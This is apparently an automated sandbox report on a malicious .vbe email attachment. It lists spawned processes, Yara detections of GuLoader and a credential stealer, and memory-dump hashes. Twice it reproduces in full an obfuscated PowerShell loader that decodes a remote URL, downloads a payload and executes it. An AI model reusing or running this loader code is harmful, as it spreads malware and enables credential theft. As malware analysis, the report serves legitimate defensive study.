                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:6
                                Start time:02:53:15
                                Start date:03/07/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe"
                                Imagebase:0x7ff655a60000
                                File size:170'496 bytes
                                MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:02:54:38
                                Start date:03/07/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,nv neMonM.tSpeMes P. PH.eeFraPldCye rOcs .[ b$VeD AiSpsR s KeHer .s u]Ud=Be$P,SIncAtlAuaHefI f FsCo ');$Omkranses=Immatrikulationens 'Be$AfKGeoK,nB.sKoe ,k,ov He.lnDit eCosOv. uDDio.awTan .l Lo SaD dV F ,iExl,me C(Te$H,RBreKndSneJesPiiTigFunS,aVit Si ,nCugFa,Ma$ Vp iRetM.iyeaNolSa)Ka ';$Vitial=$Chaconners172[0];Influerende (Immatrikulationens 'Au$ ,gSelDioClbInaEnlRe:OvSTyk.trGruI pElfO o rS ePala sKnkBrefytL,=Un(suTAfeTusS,t S-MeP paA t.oh U A,$FeV aiHetAmiPaa alKe)H ');while (!$Skrupforelsket) {Influerende (Immatrikulationens 'N.$ gCrl ,o yb naEylHe:M BRee Cfs.e rEjnO.eO.dBa= P$EntMarBausyeKn ') ;Influerende $Omkranses;Influerende (Immatrikulationens 'D S ,tTaastr gtDa-hySSklLee SeKupT. .u4Un ');Influerende (Immatrikulationens 'Ch$U.gRelhaoR b aR lre:AfSUnkKur BuW,pKrfEro SrA ePrl .sOgkP,eGetA =Te(MiTnoeGis rt T- SP abetGah a Su$.aVPuiUntBaig aSllUn)Sw ') ;Influerende (Immatrikulationens 'Re$IngPolFiostb ,aKalMe:,rPS a.nlK,aPetMoaGnltoiE.s,ye ,=Pl$D gBals.oAnbSpaSllSp:meKT oS.mT.eTad aiK aO,n Ut reS.rT.1 0Gy4 a+Wi+Ne%Sa$S HHayAmgUniTreMaj.an.weA,kTeo .m PmNos,ei AoPlnMyeFinResSk.V cMaoDuuMenGit.o ') ;$Redesignating=$Hygiejnekommsionens[$Palatalise];}$Pushmina119=294060;$Faseforvrngning=27039;Influerende (Immatrikulationens ' h$R,gAdlU.oSob a HlFl: .DGri .sLacPoo .pP.h ei Cl,cefl Di=Pr .GYveBot,t-K,CS,o fnG.t Ge YnThtNi .i$KlV aiT,ts,i,aaOrl U ');Influerende (Immatrikulationens ' N$Deg TlStoBrb a,elOu: JJBaoprv.pi Ma lB iUnt TyFl Be=Br E.[UtSP y As,at ,e,pmAf. AC.uo FnP v SeB rAgtG ]Mi:S :UnFSlrepo.emRuB.paJ.sOdeU 6.e4BrSWitTir ei Ln mg,o(Th$BeDEni .sN,cAno.cpSkhvaiKol Be R).a ');Influerende (Immatrikulationens 'Ta$ CgmulP oInbCoaOdlSt:SuRTye fS,rP,a cBrtAnis,nIngUn Th=.n fr[OvSGay,ysBetOue em.a.,eT,neSexAnt K.,vE .naucEkoBedsoi Kn,sgAs]M,:Ve:biAS,SBaCCaIP,IMu.SuG me AtSeSU t Cr.eiR nL g.u( D$InJBro .vB.iC.ae.l ,iApt ,yAf)Le ');Influerende (Immatrikulationens ' k$Fog .l Eo cbK aC lEn: PEFnfQufGuelacmutCieTrdMe= .$ oR eHef .rAka c Ct,ei onAmg,f. lsApu Ob sPltD r .i onEbg ,( W$BlP nuFesBihBemU.i Fn AaSa1 e1,p9 F,Sp$SoFSaa SsR,eDof,noUdr bvSnr snBigAan,di,onL.gLe)De ');Influerende $Effected;"
                                Imagebase:0x7ff6e2cc0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:10
                                Start time:02:54:38
                                Start date:03/07/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7fce30000
                                File size:875'008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:11
                                Start time:02:54:39
                                Start date:03/07/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"
                                Imagebase:0x7ff676fa0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:13
                                Start time:02:54:47
                                Start date:03/07/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,nv neMonM.tSpeMes P. PH.eeFraPldCye rOcs .[ b$VeD AiSpsR s KeHer .s u]Ud=Be$P,SIncAtlAuaHefI f FsCo ');$Omkranses=Immatrikulationens 'Be$AfKGeoK,nB.sKoe ,k,ov He.lnDit eCosOv. uDDio.awTan .l Lo SaD dV F ,iExl,me C(Te$H,RBreKndSneJesPiiTigFunS,aVit Si ,nCugFa,Ma$ Vp iRetM.iyeaNolSa)Ka ';$Vitial=$Chaconners172[0];Influerende (Immatrikulationens 'Au$ ,gSelDioClbInaEnlRe:OvSTyk.trGruI pElfO o rS ePala sKnkBrefytL,=Un(suTAfeTusS,t S-MeP paA t.oh U A,$FeV aiHetAmiPaa alKe)H ');while (!$Skrupforelsket) {Influerende (Immatrikulationens 'N.$ gCrl ,o yb naEylHe:M BRee Cfs.e rEjnO.eO.dBa= P$EntMarBausyeKn ') ;Influerende $Omkranses;Influerende (Immatrikulationens 'D S ,tTaastr gtDa-hySSklLee SeKupT. .u4Un ');Influerende (Immatrikulationens 'Ch$U.gRelhaoR b aR lre:AfSUnkKur BuW,pKrfEro SrA ePrl .sOgkP,eGetA =Te(MiTnoeGis rt T- SP abetGah a Su$.aVPuiUntBaig aSllUn)Sw ') ;Influerende (Immatrikulationens 'Re$IngPolFiostb ,aKalMe:,rPS a.nlK,aPetMoaGnltoiE.s,ye ,=Pl$D gBals.oAnbSpaSllSp:meKT oS.mT.eTad aiK aO,n Ut reS.rT.1 0Gy4 a+Wi+Ne%Sa$S HHayAmgUniTreMaj.an.weA,kTeo .m PmNos,ei AoPlnMyeFinResSk.V cMaoDuuMenGit.o ') ;$Redesignating=$Hygiejnekommsionens[$Palatalise];}$Pushmina119=294060;$Faseforvrngning=27039;Influerende (Immatrikulationens ' h$R,gAdlU.oSob a HlFl: .DGri .sLacPoo .pP.h ei Cl,cefl Di=Pr .GYveBot,t-K,CS,o fnG.t Ge YnThtNi .i$KlV aiT,ts,i,aaOrl U ');Influerende (Immatrikulationens ' N$Deg TlStoBrb a,elOu: JJBaoprv.pi Ma lB iUnt TyFl Be=Br E.[UtSP y As,at ,e,pmAf. AC.uo FnP v SeB rAgtG ]Mi:S :UnFSlrepo.emRuB.paJ.sOdeU 6.e4BrSWitTir ei Ln mg,o(Th$BeDEni .sN,cAno.cpSkhvaiKol Be R).a ');Influerende (Immatrikulationens 'Ta$ CgmulP oInbCoaOdlSt:SuRTye fS,rP,a cBrtAnis,nIngUn Th=.n fr[OvSGay,ysBetOue em.a.,eT,neSexAnt K.,vE .naucEkoBedsoi Kn,sgAs]M,:Ve:biAS,SBaCCaIP,IMu.SuG me AtSeSU t Cr.eiR nL g.u( D$InJBro .vB.iC.ae.l ,iApt ,yAf)Le ');Influerende (Immatrikulationens ' k$Fog .l Eo cbK aC lEn: PEFnfQufGuelacmutCieTrdMe= .$ oR eHef .rAka c Ct,ei onAmg,f. lsApu Ob sPltD r .i onEbg ,( W$BlP nuFesBihBemU.i Fn AaSa1 e1,p9 F,Sp$SoFSaa SsR,eDof,noUdr bvSnr snBigAan,di,onL.gLe)De ');Influerende $Effected;"
                                Imagebase:0x730000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000D.00000002.878918969194.0000000008A70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.878919425134.0000000008CCF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:14
                                Start time:02:54:48
                                Start date:03/07/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"
                                Imagebase:0x9c0000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:15
                                Start time:02:55:01
                                Start date:03/07/2024
                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                Imagebase:0x530000
                                File size:516'608 bytes
                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.882856308898.0000000020C85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:false

                                Target ID:16
                                Start time:02:55:20
                                Start date:03/07/2024
                                Path:C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe"
                                Imagebase:0x7e0000
                                File size:516'608 bytes
                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 0%, ReversingLabs
                                Reputation:high
                                Has exited:true

                                Target ID:17
                                Start time:02:55:20
                                Start date:03/07/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                Imagebase:0x7ff68ef30000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:18
                                Start time:02:55:28
                                Start date:03/07/2024
                                Path:C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe"
                                Imagebase:0x7e0000
                                File size:516'608 bytes
                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Reset < >
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.882944059593.00007FFE578E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE578E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffe578e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9105ae009019dfebcca5dd47a9cb6df9be3eb6c5ba0d850da3759458e5a9ce85
                                  • Instruction ID: 654e0cccd463f5401e486666a4468a0792287a1749b060e496342553c0a1cb72
                                  • Opcode Fuzzy Hash: 9105ae009019dfebcca5dd47a9cb6df9be3eb6c5ba0d850da3759458e5a9ce85
                                  • Instruction Fuzzy Hash: 4001C431A1895E8FD795EB1C98106B8B7E1FF89254B5801BAE40CC71B2CF25EC618700
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.882942820343.00007FFE57810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE57810000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffe57810000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5965807c4525557910899ec0ff41f7633b86f5abd71a67084e2b1c763bfeec03
                                  • Instruction ID: f26dfe93bb68ab632d0cd72443decfbff08696f763333c439329c1e6ad681bfa
                                  • Opcode Fuzzy Hash: 5965807c4525557910899ec0ff41f7633b86f5abd71a67084e2b1c763bfeec03
                                  • Instruction Fuzzy Hash: DF01677111CB0C4FDB48EF0CE451AA5B7E0FB95324F10056DE58AC3661DA36E891CB45
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.882944059593.00007FFE578E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE578E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffe578e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 91d4fb4803b08f0f44cd7376ad8cf502f23f6fed8e1ff0a0f3c7330e68d03d2d
                                  • Instruction ID: 5c487ee4c63e165e27ad2538ff1a88f86f93565be7bbe45e19e31e4a45ea26f2
                                  • Opcode Fuzzy Hash: 91d4fb4803b08f0f44cd7376ad8cf502f23f6fed8e1ff0a0f3c7330e68d03d2d
                                  • Instruction Fuzzy Hash: B8F0F831B1852D8FDB94EF1CD445AA8B3E1FF49251B5801B6E40DCB161CB35E861CB80
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878906395585.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_46b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fc96e0953208e037fe7ae201839127be4ca2c6ebdb363defd5f726f72881cb14
                                  • Instruction ID: adf12a120b19a74f22152206c230ebff20b03c868472ae472a29f6b1d553a706
                                  • Opcode Fuzzy Hash: fc96e0953208e037fe7ae201839127be4ca2c6ebdb363defd5f726f72881cb14
                                  • Instruction Fuzzy Hash: 6CB14C70E00209DFDF14EFA9C9857DEBBF6AB88304F148529D855A7394EB74A885CB81
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878906395585.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_46b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 576fb525283a4d2757db18158fb53272fe3401f12cc00a621b163d0957a411a2
                                  • Instruction ID: bef3cd75e28f6cf5bbf127b02994a7c72c14df7993dead2951f38b8d5b862e26
                                  • Opcode Fuzzy Hash: 576fb525283a4d2757db18158fb53272fe3401f12cc00a621b163d0957a411a2
                                  • Instruction Fuzzy Hash: 70B16DB0E002098FDB14CFA9C9857DEBBF2BF88354F148529D555AB394EB34A885CBC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878919355754.0000000008B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8b00000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$4'7q$4'7q$4'7q$4'7q$4'7q$4'7q$4'7q$4'7q$4'7q$4'7q
                                  • API String ID: 0-3575083945
                                  • Opcode ID: f28146d3a979583f87ebc12fac16bb8c43c7d48670fad02b1379a6c2d9f98067
                                  • Instruction ID: 2055d9c84b17e5d8011103aca13d3b4d061e62e4e83788b04c53bf194586d40a
                                  • Opcode Fuzzy Hash: f28146d3a979583f87ebc12fac16bb8c43c7d48670fad02b1379a6c2d9f98067
                                  • Instruction Fuzzy Hash: 46327074A002199FDB24DF28CA94BADBBB2EF85304F5085D9D5096F382CB35AD85CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$4'7q$4'7q$4'7q$4'7q$4'7q$4'7q$tP7q$tP7q
                                  • API String ID: 0-4180580360
                                  • Opcode ID: 3ed3c3b6add5c33bb7793c786f0a21e4377b7055fe8107ba68a19534daf9fb08
                                  • Instruction ID: 739577d1d49bd2511a0df8368d368645cc364eddd5b65a3ebf5e667376820ded
                                  • Opcode Fuzzy Hash: 3ed3c3b6add5c33bb7793c786f0a21e4377b7055fe8107ba68a19534daf9fb08
                                  • Instruction Fuzzy Hash: 6392A3B4A10245DFDB24CB68C940BAABBB2FF85314F1484ABD519AF385CB35ED41CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$4'7q$4'7q$tP7q$tP7q$$7q$$7q$$7q$$7q
                                  • API String ID: 0-1009398489
                                  • Opcode ID: 46552f1d62b6fb87965e1b42915846fe3c9a33671d2466a98e8620894889401b
                                  • Instruction ID: ea7ab838521375c96c8f37e574e8c342e9e827d0a19c569fb1b4aba2f715d2aa
                                  • Opcode Fuzzy Hash: 46552f1d62b6fb87965e1b42915846fe3c9a33671d2466a98e8620894889401b
                                  • Instruction Fuzzy Hash: 33628EB4B00205EFDB55CB69C550AAABBE2FF89314F14C06AD8159F355DB32EC41CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878919355754.0000000008B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8b00000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$tP7q$tP7q$$7q$$7q$$7q$$7q$$7q$$7q
                                  • API String ID: 0-2559607536
                                  • Opcode ID: da304fc3bac44633ccb32c4a995600dca2b1903b5d0b186b9a455b4f9da94edf
                                  • Instruction ID: 2c7fe7e2d230cde92e845e40d516fc59dd3763cf5fb7148a25d1804a32568895
                                  • Opcode Fuzzy Hash: da304fc3bac44633ccb32c4a995600dca2b1903b5d0b186b9a455b4f9da94edf
                                  • Instruction Fuzzy Hash: EE02C275B00248CFCB25CB6CC548AAABFE2EF88315F1481AAD8159B395DB36DC45CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$4'7q$4'7q$$7q$$7q$$7q$$7q$$7q$$7q
                                  • API String ID: 0-1987112005
                                  • Opcode ID: 184822875313a063532bccf7442ff8baeb085f06cd24e5ac6b54995ee2bd8e40
                                  • Instruction ID: f95d14c763991fe3f7ab3b05c560797ceb6d8f3bb2c3bb279c6f9388108ee09c
                                  • Opcode Fuzzy Hash: 184822875313a063532bccf7442ff8baeb085f06cd24e5ac6b54995ee2bd8e40
                                  • Instruction Fuzzy Hash: 5DF12AB9B002469FCF259B7985406EBBBE6BFC6214F1480BFC556CB241DB36E841C762
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$4'7q$4'7q$4'7q$4'7q
                                  • API String ID: 0-4219019117
                                  • Opcode ID: 668f512c6f859cf120a939899d1763ac99f096b89bb9a23802a7deeff5976032
                                  • Instruction ID: 615e46f021c15cf11c57c1ffe3a8b377112bde3d3db416125696122fd215eeef
                                  • Opcode Fuzzy Hash: 668f512c6f859cf120a939899d1763ac99f096b89bb9a23802a7deeff5976032
                                  • Instruction Fuzzy Hash: 91D1AFB4B00209DFDB18CB68C554BAEBBA2AF89304F148469D8126F395DB75EC42CB95
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$$7q$$7q$$7q
                                  • API String ID: 0-2833837446
